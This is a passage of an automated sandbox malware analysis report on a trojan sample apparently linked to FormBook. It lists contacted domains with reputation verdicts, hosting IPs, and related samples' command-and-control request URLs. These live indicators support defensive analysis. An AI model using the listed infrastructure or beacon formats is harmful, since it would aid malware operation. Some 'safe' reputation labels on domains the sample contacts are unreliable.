                                    http://www.hblcfl.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.iqd964.com/p25s/www.allsttk.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.couldskuathink.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.adamdavisgroup.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.jdyokum.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.tjhymzz.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.desipizza.ukexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.pfokn.online/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.32612.xyzexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.adamdavisgroup.com/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.desipizza.ukReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.blueskyinteractives.co.uk/p25s/www.adamdavisgroup.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.tjhymzz.com/p25s/www.blueskyinteractives.co.ukexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.blueskyinteractives.co.ukReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fliparcher.store/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.anbietertest.com/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.pfokn.onlineexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.carterandcone.comlSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.iftar.rsvpexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.founder.com.cn/cnSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.couldskuathink.com/p25s/www.tjhymzz.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.pfokn.onlineReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.jdyokum.com/p25s/www.iftar.rsvpexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.anbietertest.com/p25s/www.hblcfl.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.pfokn.online/p25s/www.katkisiz.infoexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.adamdavisgroup.com/p25s/www.jdyokum.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.fontbureau.com/designers8SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.anbietertest.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fliparcher.storeexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.hblcfl.com/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.associazionefaber.com/p25s/www.fliparcher.storeexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.allsttk.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.allsttk.com/p25s/explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.blueskyinteractives.co.uk/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.katkisiz.infoReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fliparcher.storeReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.iftar.rsvpReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          156.242.168.70
                                          www.hblcfl.comSeychelles
                                          132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                          45.195.140.44
                                          www.anbietertest.comSeychelles
                                          133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                          213.171.195.105
                                          www.desipizza.ukUnited Kingdom
                                          8560ONEANDONE-ASBrauerstrasse48DEtrue
                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                          Analysis ID:810265
                                          Start date and time:2023-02-16 23:47:12 +01:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 10m 4s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:10
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample file name:SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@512/2@4/3
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:
                                          • Successful, ratio: 69.7% (good quality ratio 64.1%)
                                          • Quality average: 73.4%
                                          • Quality standard deviation: 30.6%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 46
                                          • Number of non-executed functions: 167
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.90.153.243, 20.90.152.133, 20.90.156.32
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, wns.notify.trafficmanager.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          TimeTypeDescription
                                          23:48:19API Interceptor1x Sleep call for process: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe modified
                                          23:49:01API Interceptor550x Sleep call for process: explorer.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          213.171.195.105Order specification.exeGet hashmaliciousFormBookBrowse
                                          • www.g2fm.co.uk/ippd/?ZRoUGh=Z3J4lz2fLV2p/i1P6E1fF+ASb/jivJDplP/9yL4woF3bSsXxh6Hl7acjlqyscw4wB7SO8nND31qDnPFOUNxJ/Q9oRbpwS6njTA==&LFw=RCpUoh
                                          Zahlungsbestatigung.exeGet hashmaliciousFormBookBrowse
                                          • www.brand-growth.com/keht/?ui9anAh7=JUpG2+I3/nVj9mrkCgkIZPOF9Wm2Y9UioOX0viYno+E74sT5dRRlEcSac+qM0NoeEDhFOUUQng222XaWmvGgWtqjKhgsM3pRSZzyS3+s8VF6&W0s=tUdHFX_
                                          Order specification.exeGet hashmaliciousFormBookBrowse
                                          • www.g2fm.co.uk/ippd/?P3P2FX=dsNnsySir6HfQ56p&4oY8PKi=Z3J4lz2fLV2p/i1P6E1fF+ASb/jivJDplP/9yL4woF3bSsXxh6Hl7acjlqyscw4wB7SO8nND31qDnPFOUNxJ/Q9oRbpwS6njTA==
                                          ATTACHED INVOICE.exeGet hashmaliciousFormBookBrowse
                                          • www.scriptmonkey.uk/fuo8/?8kcP=XG/6YPG4mC4580zNtSIrbcmm/9KFIxldlincGDuLPHZVLaCvtngXv0zfD4opFmKWjRRc5Wz70VNDi0pEoK7q0pvyBJesqdn12Q==&yA=RUBKyFdDb6LA
                                          New Order.exeGet hashmaliciousFormBookBrowse
                                          • www.scriptmonkey.uk/fuo8/?k50T0=XG/6YPG4mC4580zNtSIrbcmm/9KFIxldlincGDuLPHZVLaCvtngXv0zfD4opFmKWjRRc5Wz70VNDi0pEoK7q0pvyBJesqdn12Q==&5xu=efj0_42CO
                                          SecuriteInfo.com.Win32.PWSX-gen.93.10409.exeGet hashmaliciousFormBookBrowse
                                          • www.g2fm.co.uk/ippd/?Rp6W=x4IN&dpa=Z3J4lz2fLV2p/i1P6E1fF+ASb/jivJDplP/9yL4woF3bSsXxh6Hl7acjlqyscw4wB7SO8nND31qDnPFOUNxJ/Q9oRbpwS6njTA==
                                          SHIPPING DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                          • www.scriptmonkey.uk/fuo8/?wC8wiS=XG/6YPG4mC4580zNtSIrbcmm/9KFIxldlincGDuLPHZVLaCvtngXv0zfD4opFmKWjRRc5Wz70VNDi0pEoK7rqYvUPbXarPCR8K09EWJlmydn&nH=s4C8kODtXsf
                                          DSG2011001_INV+PL (3).exeGet hashmaliciousFormBookBrowse
                                          • www.scriptmonkey.uk/fuo8/?ABEc=XG/6YPG4mC4580zNtSIrbcmm/9KFIxldlincGDuLPHZVLaCvtngXv0zfD4opFmKWjRRc5Wz70VNDi0pEoK7rqYvUPbXarPCR8K09EWJlmydn&StmJ=vMlV2CBxLadJ
                                          HSBC Payment Advice_pdf.exeGet hashmaliciousFormBookBrowse
